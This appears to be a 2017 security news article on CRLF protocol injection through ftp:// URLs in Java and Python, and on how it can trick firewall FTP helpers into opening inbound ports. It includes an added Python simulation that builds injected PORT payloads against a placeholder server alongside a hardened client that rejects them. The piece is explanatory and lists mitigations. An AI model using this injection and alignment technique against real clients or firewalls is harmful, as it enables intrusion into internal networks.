
Java and Python have security flaws you can exploit to attack firewalls


February 21, 2017

Most system administrators in the industry will by now agree that Java and Python carry serious security flaws that attackers can exploit to get connections through some firewalls.

Since neither language has been patched yet, it might be a good time to tell your developers about this, in case they don't already know.

The Java vulnerability is a protocol injection flaw in its FTP URL handling: an attacker who controls an ftp:// URL can insert their own commands into the FTP control connection, and a firewall that inspects FTP control traffic can then be fooled into allowing TCP connections from the Internet to hosts on the inside. Protocol injection itself is nothing new; the firewall consequence is the interesting part.

That's explained in more detail in two documents by Alexander Klink and by Blindspot Security's Timothy Morgan.

Klink's discovery was that Java's FTP client, which an attacker can reach through an XML External Entity (XXE) reference to an ftp:// URL, does not syntax-check the username it takes from the URL before sending it to the server, and that is the core of the vulnerability.

Specifically, carriage return (CR) and line feed (LF) characters should be rejected but aren't, so everything after an injected CRLF goes out as a separate command on the control connection. In his write-up, Klink's demonstration points the ftp:// URL at an SMTP server rather than an FTP server: the injected lines form a complete SMTP transaction, and the e-mail is sent even though the FTP connection attempt itself fails.

But it gets worse... Klink concluded that “this attack is particularly interesting in a scenario where you can reach an unrestricted, maybe not even spam- or malware-filtering internal mail server from the machine doing the XML parsing.”

Morgan's contribution was the realization that the same behaviour can get an attacker through a firewall on its high ports (1024 to 65535): a firewall that tracks FTP control connections opens the port named in a client's PORT command, and the attacker can inject that command. It is a multi-stage process such as this:

  • Get the victim's internal IP address – the firewall only honours a PORT command that names the client which sent it, so the attacker needs that address. This, Morgan says, is easy: “send a URL, see how the client behaves, then try another until the attack is successful”;
  • Packet alignment – this is the secret weapon that makes the attack work. The firewall's FTP helper only recognises a PORT command that sits at the start of a TCP packet, and because FTP is synchronous (each side waits for a response to each individual line it sends) the attacker must pad the request so the injected command lands exactly there. If you get this wrong, the attack fails.
  • Morgan says he is holding back publication of a proof-of-concept script until Oracle (and Python's developers) respond to this security issue.

But he envisages his exploit being used for man-in-the-middle (MITM) attacks, server-side request forgery (SSRF), XXE attacks and more, and once past the firewall, desktop hosts can be attacked even if they don't have Java installed: the opened port leads to whatever service is listening on it.

Python, he warns, is similarly vulnerable through its urllib and urllib2 libraries, although “this injection appears to be limited to various attacks via directory names specified in the URL,” he asserted.
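To make the mechanics concrete, here is an added example in Python; it is not code from Klink's or Morgan's write-ups, nor Java's or Python's real FTP client, nor any particular firewall. It models a client that copies the URL's userinfo and path components straight onto the FTP control channel without rejecting CR/LF (the Java username case and the urllib directory-name case), a hardened variant that refuses them, and a toy “classic mode” firewall helper that only opens a pinhole when a PORT command naming the client's own address begins a TCP segment, which is what makes the alignment step matter. The server name attacker.example, the victim address 10.1.2.3, the fixed segment sizes and the default anonymous credentials are constructed assumptions.

```python
"""Added illustration of FTP protocol-stream injection via an ftp:// URL.
Constructed model only: it does not reproduce Java's or Python's real FTP
clients, nor any particular firewall. Assumed values are marked below."""
import re
from urllib.parse import quote, unquote, urlsplit

CRLF = "\r\n"
# Not anchored with ^: re.match() already binds it to the start of the text.
PORT_RE = re.compile(r"PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\r\n")


def naive_command_stream(url):
    """Control-channel text a client emits when it copies URL components
    straight into USER/PASS/CWD/RETR without rejecting CR or LF."""
    parts = urlsplit(url)
    user = unquote(parts.username or "anonymous")        # assumed default
    password = unquote(parts.password or "anonymous@")   # assumed default
    path = unquote(parts.path or "/").strip("/")
    dirs, _, filename = path.rpartition("/")
    cmds = [f"USER {user}", f"PASS {password}"]
    cmds += [f"CWD {d}" for d in dirs.split("/") if d]   # one CWD per directory
    cmds.append(f"RETR {filename}")
    return CRLF.join(cmds) + CRLF


def checked_command_stream(url):
    """Hardened client: refuse CR/LF in any URL component before it reaches
    the wire. This is the check the vulnerable clients lacked."""
    parts = urlsplit(url)
    for field in (parts.username, parts.password, parts.path):
        decoded = unquote(field) if field else ""
        if "\r" in decoded or "\n" in decoded:
            raise ValueError(f"CR/LF in ftp:// URL component: {field!r}")
    return naive_command_stream(url)


def injected_url(server, victim_ip, port, pad, where="user"):
    """Attacker's URL: `pad` filler characters to align the injected PORT
    command on a segment boundary, then CRLF plus a PORT naming the victim."""
    a, b, c, d = victim_ip.split(".")
    port_cmd = f"PORT {a},{b},{c},{d},{port // 256},{port % 256}"
    payload = "x" * pad + quote(CRLF + port_cmd, safe="")
    if where == "user":
        return f"ftp://{payload}@{server}/file"    # userinfo injection (Java case)
    return f"ftp://{server}/{payload}/file"        # directory-name injection (urllib case)


def alg_pinholes(stream, client_ip, segment_size):
    """Toy 'classic mode' FTP helper. The control stream is cut into
    fixed-size TCP segments (a simplification); a PORT command is honoured
    only if it starts a segment and names the client that sent it, and the
    firewall then permits an inbound data connection to that address/port."""
    holes = []
    for i in range(0, len(stream), segment_size):
        m = PORT_RE.match(stream[i:i + segment_size])
        if not m:
            continue                               # absent, or misaligned
        a, b, c, d, hi, lo = map(int, m.groups())
        ip, port = f"{a}.{b}.{c}.{d}", hi * 256 + lo
        if ip == client_ip and 1024 <= port <= 65535:
            holes.append((ip, port))
    return holes


if __name__ == "__main__":
    SEG = 64                                       # assumed segment size
    aligned = injected_url("attacker.example", "10.1.2.3", 1024, pad=57)
    print(alg_pinholes(naive_command_stream(aligned), "10.1.2.3", SEG))     # [('10.1.2.3', 1024)]
    off_by_one = injected_url("attacker.example", "10.1.2.3", 1024, pad=56)
    print(alg_pinholes(naive_command_stream(off_by_one), "10.1.2.3", SEG))  # []
```

With a 64-byte segment, 57 filler characters put “PORT …” exactly at byte 64 of the stream (after “USER ” and the CRLF) and the pinhole opens; one character less and the helper sees “ORT …” at the segment start and ignores it. Guessing the wrong internal address also yields nothing, which is why step one of Morgan's procedure exists. The hardened client rejects both injected URLs before anything is sent.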

By way of mitigation, Morgan suggests disabling Java on desktops and in browsers, and disabling “classic mode” FTP (the firewall helper that opens ports on the strength of PORT commands seen in the control channel) on all firewalls. This cannot be stressed enough, the two security experts warn.

Source: Blindspot Security.


